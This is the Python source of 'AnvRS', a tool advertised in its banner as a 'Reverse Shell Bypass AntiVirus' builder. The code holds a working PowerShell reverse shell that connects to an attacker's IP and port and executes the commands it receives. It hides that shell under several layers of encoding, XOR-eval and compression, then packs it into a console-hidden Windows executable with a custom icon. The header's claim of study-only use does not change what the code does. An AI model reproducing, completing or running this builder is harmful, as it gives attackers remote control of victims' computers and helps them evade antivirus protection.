"""
<Coded by Hevin>
Đừng xóa đoạn này nếu bạn tôn trọng tác giả :3
Donate cho Hevin bằng cách vượt link: https://web1s.info/DonateForHevin
Cảm ơn các bạn rất nhiều ! Hãy nhớ sử dụng công cụ AnvRS với mục đích
học tập, nghiên cứu thôi nhé !
"""
import base64
import random
import re
import marshal
import zlib
import lzma
import argparse
import sys
import os
import shutil
import struct
import time
import subprocess
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def get_func_name_random(min, max):
length_random = random.randint(min, max)
random_name = [i for i in chars]
res = ''.join(random.choice(random_name) for _ in range(length_random))
return res
def split_base64_equally(base64_string, num_parts):
total_length = len(base64_string)
part_length = total_length // num_parts
parts = [base64_string[i:i+part_length] for i in range(0, total_length, part_length)]
return parts
def encstr(s, num_part):
result_parts = split_base64_equally(s, num_part)
random_variables = ''
random_variables_saved = []
for _, part in enumerate(result_parts):
vari = get_func_name_random(5,10)
random_variables += f'${vari} = "{part}"\n'
random_variables_saved.append("$"+vari)
plusvar = '+'.join(random_variables_saved)
return random_variables, plusvar
def encstr_payload(s, num_part):
result_parts = split_base64_equally(s, num_part)
random_variables = ''
random_variables_saved = []
for _, part in enumerate(result_parts):
vari = get_func_name_random(5,10)
random_variables += f'{vari} = "{part}"\n'
random_variables_saved.append(vari)
plusvar = '+'.join(random_variables_saved)
return random_variables, plusvar
def enc_data_type(s, num_part):
result_parts = split_base64_equally(s, num_part)
random_variables = ''
random_variables_saved = []
for _, part in enumerate(result_parts):
vari = get_func_name_random(5,10)
random_variables += f'${vari} = "{part}"\n'
random_variables_saved.append("$"+vari)
plusvar = ''.join(random_variables_saved)
return random_variables, plusvar
def safe_replace(main_str, search_str, replace_str):
escaped_search_str = re.escape(search_str)
regex = r'\b' + escaped_search_str + r'\b'
modified_str = re.sub(regex, replace_str, main_str)
return modified_str
def payload2decimal(payload):
decimal_values = [str(ord(char)) for char in payload]
decimal_string = ','.join(decimal_values)
return decimal_string
def enc(contents):
string = contents
a = 0
key = ""
while a < 100:
key = key + str(random.randint(0, 9))
a += 1
payload_length = len(string)
output_string = ""
for i in range(payload_length):
current_string = string[i]
current_key = key[i % len(key)]
output_string += chr(ord(current_string) ^ ord(current_key))
c = repr(output_string)
encrypt = c.replace("'", "")
code = rf"""
var1 = "{encrypt}"
var2 = "{key}"
var3 = len(var1)
var4 = ""
for var5 in range(var3):
var6 = var1[var5]
var7 = var2[var5 % len(var2)]
var4 += chr(ord(var6) ^ ord(var7))
eval(compile(var4, '', 'exec'))
"""
items = ['var1', 'var2', 'var3', 'var4', 'var5', 'var6', 'var7']
for item in items:
randomstr = get_func_name_random(6,8)
code = code.replace(item, randomstr)
return code
reverse_shell_powershell = r"""
replace-dns
varnetsocket
vario
varssl
function DNSLookup ($DNSRecord) {
return (([text.encoding]::UTF8).GetString((Invoke-WebRequest (plussd + $DNSRecord) -Headers @{'accept'='application/dns-json'}).Content) | ConvertFrom-Json).Answer.data.Trim('"')
}
do {
Start-Sleep -Seconds 1
try{
$TCPClient = New-Object netsocket('IP-ADDRESS', PORT)
} catch {}
} until ($TCPClient.Connected)
$NetworkStream = $TCPClient.GetStream()
$SslStream = New-Object sslstream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]))
$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false)
if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {
$SslStream.Close()
exit
}
$StreamWriter = New-Object iostream($SslStream)
function WriteToStream ($String) {
[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
$StreamWriter.Write($String + 'AnvRS> ')
$StreamWriter.Flush()
}
WriteToStream ''
try {
while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
$Output = try {
Invoke-Expression $Command 2>&1 | Out-String
} catch {
$_ | Out-String
}
WriteToStream ($Output)
}
} catch [System.IO.IOException] {
Write-Host ""
} finally {
$StreamWriter.Close()
$SslStream.Close()
}
"""
banner = r"""
░█████╗░███╗░░██╗██╗░░░██╗██████╗░░██████╗
██╔══██╗████╗░██║██║░░░██║██╔══██╗██╔════╝
███████║██╔██╗██║╚██╗░██╔╝██████╔╝╚█████╗░
██╔══██║██║╚████║░╚████╔╝░██╔══██╗░╚═══██╗
██║░░██║██║░╚███║░░╚██╔╝░░██║░░██║██████╔╝
╚═╝░░╚═╝╚═╝░░╚══╝░░░╚═╝░░░╚═╝░░╚═╝╚═════╝░
<Reverse Shell Bypass AntiVirus>
╔══════════════════════════════════════════════════════╗
║ -> Developed by @Hevin and @Anonyviet ║
║ -> Discord: @hevin19 ║
║ -> Donate for me: https://web1s.info/DonateForHevin ║
╚══════════════════════════════════════════════════════╝
"""
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip", type=str,
help="Your IP Adress. Example: 127.0.0.1")
parser.add_argument("-p", "--port", type=str,
help="Your Port. Example: 1234")
parser.add_argument("--icon", type=str,
help="Enter the path to your ico file")
parser.add_argument("-o", "--output", type=str,
help="Output File. Default: 'AnonyvietHandsome.exe' ")
args = parser.parse_args()
if len(sys.argv) == 1:
print(banner.center(20))
parser.print_help(sys.stderr)
sys.exit(0)
if args.output:
output_file = args.output
else:
output_file = 'AnonyvietHandsome.exe'
add_icon = ''
if args.icon:
icon_file = args.icon
if os.path.exists(icon_file):
add_icon = True
pass
else:
print(f'[!] "{icon_file}" file not found, please check and try again')
sys.exit(0)
else:
add_icon = False
ip_address = args.ip
port = args.port
os.system('cls')
print(banner.center(20))
print('')
time.sleep(2)
ip_parts = list(map(int, ip_address.split('.')))
hex_representation = f"0x{''.join(format(part, '02x') for part in ip_parts)}"
print(f"[+] Converting {ip_address} to HEX")
time.sleep(1)
vardns, dnslink = encstr('https://1.1.1.1/dns-query?name=anonyviet.com&type=', 25)
varnetsocket, netsocket = enc_data_type("Net.Sockets.TCPClient", 10)
vario, iostream = enc_data_type("IO.StreamWriter", 7)
vargetstring, getstring = enc_data_type("GetString", 4)
varssl, sslstream = enc_data_type("Net.Security.SslStream", 8)
payload = safe_replace(reverse_shell_powershell, "replace-dns", vardns)
payload = safe_replace(payload, "plussd", dnslink)
payload = safe_replace(payload, "varnetsocket", varnetsocket)
payload = safe_replace(payload, "netsocket", netsocket)
payload = safe_replace(payload, "vario", vario)
payload = safe_replace(payload, "iostream", iostream)
payload = safe_replace(payload, "varssl", varssl)
payload = safe_replace(payload, "sslstream", sslstream)
payload = safe_replace(payload, "IP-ADDRESS", hex_representation)
payload = safe_replace(payload, "PORT", port)
words = ["NetworkStream", "StreamWriter", "TCPClient", "SslStream", "DNSRecord", "BytesRead", "Command", "Output"]
for word in words:
random_str = get_func_name_random(4,8)
payload = safe_replace(payload, word, random_str)
decimal_representation = payload2decimal(payload)
print("[+] Obfuscating Payload...")
time.sleep(2)
stub = """IEx(-JoIN((decimal_representation)|%{[cHaR]$_}));ExIt"""
payload_decimal = stub.replace("decimal_representation", decimal_representation)
python_payload = r"""
import subprocess
import base64
import os
var1 = "YXB"
var2 = "wZG"
var3 = "F0YQ=="
var4 = "YQ=="
os.chdir(os.getenv(base64.b64decode(var1+var2+var3+var4).decode()))
base64payload
with open('update.ps1', 'w') as f:
f.write(base64.b64decode(plusbase).decode())
result = subprocess.run(r'powershell -c "$test = Get-Content .\update.ps1; Remove-Item -Path .\update.ps1; Invoke-Expression $test" ', shell=True, text=True, capture_output=True)
"""
encpayload = base64.b64encode(payload_decimal.encode()).decode()
base64payload, plusbase = encstr_payload(encpayload, 50)
s = python_payload.replace("base64payload", base64payload)
s = s.replace("plusbase", plusbase)
enc1 = enc(s)
enc2 = enc(enc1)
enc3 = enc(enc2)
enc4 = enc(enc3)
enc5 = enc(enc4)
comp = compile(enc5, '', 'exec')
mar = marshal.dumps(comp)
lz = lzma.compress(mar)
zl = zlib.compress(lz)
b64 = base64.b64encode(zl).decode()
stub2 = f"""import marshal, zlib, lzma, base64; exec(marshal.loads(lzma.decompress(zlib.decompress(base64.b64decode('{b64}')))))"""
b = output_file.split('.')
with open(f'{b[0]}.py', 'w') as f:
f.write(stub2)
print("[+] Compiling Payload")
if add_icon:
subprocess.run(rf"pyinstaller --onefile -i {icon_file} {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
subprocess.run(rf"pyinstaller --onefile {b[0]}.py", shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
os.remove(f'{b[0]}.spec')
shutil.move(f'dist/{b[0]}.exe', f'{b[0]}.exe')
shutil.rmtree('build')
os.rmdir('dist')
os.remove(f'{b[0]}.py')
exe = open(output_file, "r+b")
exe.seek(0x3c)
(PeHeaderOffset,) = struct.unpack("<H", exe.read(2))
exe.seek(PeHeaderOffset)
(PeSignature,) = struct.unpack("<I", exe.read(4))
if PeSignature != 0x4550:
sys.exit(-1)
exe.seek(PeHeaderOffset + 0x5C)
exe.write(struct.pack("<H", 0x02))
exe.close()
print("[+] Completed Successfully !")